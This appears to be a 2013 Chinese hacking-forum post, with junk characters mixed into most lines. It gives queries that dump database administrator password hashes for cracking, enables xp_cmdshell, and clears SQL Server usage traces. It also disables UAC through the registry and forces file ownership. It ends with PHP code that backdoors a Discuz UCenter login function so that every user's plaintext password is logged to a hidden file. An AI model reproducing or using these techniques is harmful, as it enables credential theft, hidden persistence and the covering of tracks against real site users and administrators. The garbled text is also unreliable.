; I4 _. r! |$ P" T+ c, G6 B;antian365.asp;antian365.jpg [- \% ^9 v$ J( M+ X% L
) d$ @- k1 [3 a# V3 i! \% }
各种类型数据库抓HASH破解最高权限密码!
( y( }4 I6 f1 k$ I+ t1.sql server2000
! z2 A- T9 @6 ^8 l, ] l/ N+ zSELECT password from master.dbo.sysxlogins where name='sa', a! { Y9 y$ E
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
; R$ }* ^. f2 }% K7 I- F6 e4 i2FD54D6119FFF04129A1D72E7C3194F7284A7F3A1 R$ @) {6 A' J4 R/ `
( A) D8 W$ H5 _) A: F& Y3 p
0×0100- constant header( Q7 X, ^7 d8 I; Q# J" r
34767D5C- salt
8 I5 r, Z3 [) _) }) @0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
p2 I. C8 V7 N+ s6 v! Y2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
+ C8 I6 j7 s2 q4 C+ \crack the upper case hash in ‘cain and abel’ and then work the case sentive hash- `+ A+ E) i# J; p" T4 ?
SQL server 2005:-5 w4 J/ `" g) Z' x& e% W* U+ J1 h
SELECT password_hash FROM sys.sql_logins where name='sa'
4 T. v5 i; O0 _+ i+ H/ T, _0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F5 v, h( \# q, e% U9 g7 \+ W7 [6 q
0×0100- constant header% c2 c" X& J& o, I- o! }+ B; P
993BF231-salt& Z, U% N, w% {% E) C9 E
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash$ J* Y$ W C4 ?7 V% r% I" q, j7 a
crack case sensitive hash in cain, try brute force and dictionary based attacks.
" T- X& |. H7 H4 R' \- ]8 A9 f8 `& ^( ^
% W% V9 s/ ~: j# R. uupdate:- following bernardo’s comments:-7 X) Q0 E; ^3 [+ F* ^9 }
use function fn_varbintohexstr() to cast password in a hex string.) h7 o5 x; l: y8 ~
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins$ Q1 W' K+ E" ?3 B2 m4 I \/ f/ q- b
% [9 i# E3 b7 Y# f1 e3 ^% g( |$ F' z
MYSQL:-) |* O# z E4 V* V/ l4 N
: E! e9 b N6 s1 K" q0 BIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2./ r' r2 d7 M1 b( K
$ O$ G2 C* M9 Z% c
*mysql < 4.14 U# q+ D7 P: s. h
$ t1 i5 ?: F5 L8 lmysql> SELECT PASSWORD(‘mypass’);% e9 b" d! \- @+ n$ F; l
+——————–+/ ?3 `( A% V1 `
| PASSWORD(‘mypass’) |6 B: v; H- X; D5 v% \
+——————–+. t3 l- x: x+ m6 Y% _: {& E
| 6f8c114b58f2ce9e |- n- J4 G- `8 S; e; u
+——————–+: C+ ^( |+ {2 _" z+ E( W
+ U# o0 k! a- f& O N3 H*mysql >=4.1: L V2 e5 r. P3 i9 M5 f
' H; E( i( S6 b9 Z) U" l2 S, s
mysql> SELECT PASSWORD(‘mypass’);* b {" r, U! J) Z) ]
+——————————————-+/ k6 G3 b+ _( s
| PASSWORD(‘mypass’) |& I" S) y" K$ S- t! |
+——————————————-+6 e$ I9 L" I0 y$ ?! F8 A9 `
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
. B; \: m5 u( g8 O8 q5 E+ o+——————————————-+
7 Z; e3 S" w5 I6 f- V* L- D) I6 r
; e" E J6 @3 x0 h: VSelect user, password from mysql.user% m8 Q* ?" c' p4 x. E
The hashes can be cracked in ‘cain and abel’6 w+ j8 ]& S2 [2 |: g1 L$ S
) e! U; A- ?3 `6 q# QPostgres:-
, t" X, \; ]3 u8 j% c8 EPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
' q* b' u! W1 y @: V0 f+ L8 i- Pselect usename, passwd from pg_shadow;
: T! K3 T# O' d2 ousename | passwd
, d* }7 X; {2 D2 g——————+————————————-' W! j5 y) [# s" B* V4 [6 s9 f
testuser | md5fabb6d7172aadfda4753bf0507ed4396& h% K: e! w8 {0 `
use mdcrack to crack these hashes:-
5 F( Q4 J" |( I, f$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
5 Q) D5 n1 s/ C# p& O
5 ~) i' ~3 c. v4 ?0 @# w- DOracle:-
. m, s0 f: Q) @3 Jselect name, password, spare4 from sys.user$3 N1 L2 j9 a: M- F
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
" R& R i. K5 ^2 ]* ?$ GMore on Oracle later, i am a bit bored….
2 a) q9 q5 S. m; D4 x7 d9 p3 _! s9 D# d7 }4 m. ]
P% @) e5 t4 [# d: m在sql server2005/2008中开启xp_cmdshell
9 q: Z; U% L* I: R! X' e0 C6 ?-- To allow advanced options to be changed.% m! A- J% z9 f" t
EXEC sp_configure 'show advanced options', 16 b$ b) m& e5 I; v: Z: a
GO' e! g+ h. M- ]3 T( W* u
-- To update the currently configured value for advanced options.. E# P+ ]! c! q
RECONFIGURE
/ y8 Y0 n& Q" l' yGO; w' }1 S) e# v: p% C! z. c9 R
-- To enable the feature. }. \2 t- i- J' t$ H
EXEC sp_configure 'xp_cmdshell', 1' p# `- Z9 @ J3 [6 u
GO. B5 W7 c$ Z, @6 R
-- To update the currently configured value for this feature.1 }+ p u& ?+ F% h6 p' j7 t3 m
RECONFIGURE1 i* f9 s) f! k6 ]% V( M/ f
GO) F$ _# P+ E' d) c
SQL 2008 server日志清除,在清楚前一定要备份。+ o$ B9 a1 N, Q' ?# R1 c# q
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:# a" w* @+ `+ M. v1 }1 \, A5 v
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
- x# y4 s; h0 M! r# k/ f; o5 D2 E6 j6 T9 Q" \
对于SQL Server 2008以前的版本:. c5 `7 a+ S! s6 T
SQL Server 2005:
T9 _) d6 x3 h. {+ e- K+ P5 ~删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
2 q) w# g2 u6 ~3 D& _9 `) jSQL Server 2000:
! X) Y8 `3 v- x. W- j6 ?- Z' p清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
S6 n8 S, d9 m) m7 s4 o
0 ]& W! V* N& h4 C9 H; Q. F本帖最后由 simeon 于 2013-1-3 09:51 编辑
! K) E# x( _7 }/ F& t
( Z1 ^: e1 L5 z& ~) J
, j* L7 V3 o" C9 V/ t) R& Rwindows 2008 文件权限修改* D/ n/ Q, O) y h" M9 w( _
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
% K& T7 ~3 `# u* `! ~( V( ]2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
4 s7 |& @1 w; m( I一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,* K. W# |* L( @' `2 T, X
; P2 E0 i. f8 l# x! i
Windows Registry Editor Version 5.00
$ N, R' i( [$ ^0 J5 H J$ f; n. C[HKEY_CLASSES_ROOT\*\shell\runas]
) g# F5 |8 U2 i% w0 k, E& K B@="管理员取得所有权"- c: U. a+ ~/ U- j. y. A0 N
"NoWorkingDirectory"=""
% _4 [% C9 W# ]. e& K' V[HKEY_CLASSES_ROOT\*\shell\runas\command]( m9 Q9 x" ~) m2 d x
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* F# _. z9 E4 s- g3 \"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
/ i9 B1 F( c8 i' \5 a; U j[HKEY_CLASSES_ROOT\exefile\shell\runas2]
6 Y1 {8 y" o4 H& l1 @8 z# h2 f$ t@="管理员取得所有权"3 C; D; ]: y6 j7 K6 X
"NoWorkingDirectory"=""
0 p" S' r# I; I& y[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
( ?& j: M- e' I/ Q' z@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
: V0 w$ v" X. ]7 h$ Z"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F". a" f" B) g, A. I
) }- W3 N% w) F; U' s/ X[HKEY_CLASSES_ROOT\Directory\shell\runas]9 ^7 Q& k# y3 K# ^6 @$ |
@="管理员取得所有权"2 ? l$ ?0 {' P6 A. k4 b' q( t# c
"NoWorkingDirectory"=""' ~' V' \) {& A. n
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
( F* r O0 E. O@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 T2 k% K' V, Y6 R' N- N; P, T- ^2 ["IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
4 [% h. K J- v, h4 L" `$ t0 q4 B% |) H) x% r( Y* ~
& S! i5 k; K f6 F; O# e' Twin7右键“管理员取得所有权”.reg导入$ f5 Z8 h/ b( X9 m. M
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”," I1 n5 m0 w/ ?- J
1、C:\Windows这个路径的“notepad.exe”不需要替换
5 m* O, ]; I0 y/ b% ^1 ^2、C:\Windows\System32这个路径的“notepad.exe”不需要替换9 o1 n% T% Q( S" a3 ^
3、四个“notepad.exe.mui”不要管9 C9 G% t2 n+ D2 d" r
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和' D4 H/ o2 V7 I0 [! f
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
# q/ N/ j, A7 v1 F替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,2 T: S/ |& G0 t
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。, S# Z; Y: Z; y8 H1 u9 ]6 p
windows 2008中关闭安全策略:
; S5 I5 H: v" W9 j* c. j; h& zreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
) G) W! i( k) S# a* o; x修改uc_client目录下的client.php 在
, X; A/ u! n' m$ H$ W# pfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {/ j& @( v, k! \% M
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
8 F. }; T' u/ s7 g- X你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
. C% @4 f9 `3 P/ \5 {6 jif(getenv('HTTP_CLIENT_IP')) {* j4 }7 C- |2 U/ {0 X% @
$onlineip = getenv('HTTP_CLIENT_IP');
9 O# d, \& e, V1 X3 H! P' l; L1 M} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
" o9 @4 s3 g$ v% d* E+ e$onlineip = getenv('HTTP_X_FORWARDED_FOR');
7 j @# P4 I3 e1 s3 l% ^- U1 [} elseif(getenv('REMOTE_ADDR')) {
6 @" K4 k, _! i2 C1 w; y1 c1 ^5 K/ g$onlineip = getenv('REMOTE_ADDR');, K+ s' } \ K" n
} else {
3 q; t4 B7 P' `/ l* L$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}3 N0 v% I3 \) T% p}/ l& O( d+ A* ~1 y( G+ ]
$showtime=date("Y-m-d H:i:s");
" e! l4 W* h0 x" c2 o. U $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";: c% e# g2 F/ x1 l3 |2 S
$handle=fopen('./data/cache/csslog.php','a+');1 M, X1 X2 Y6 R
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对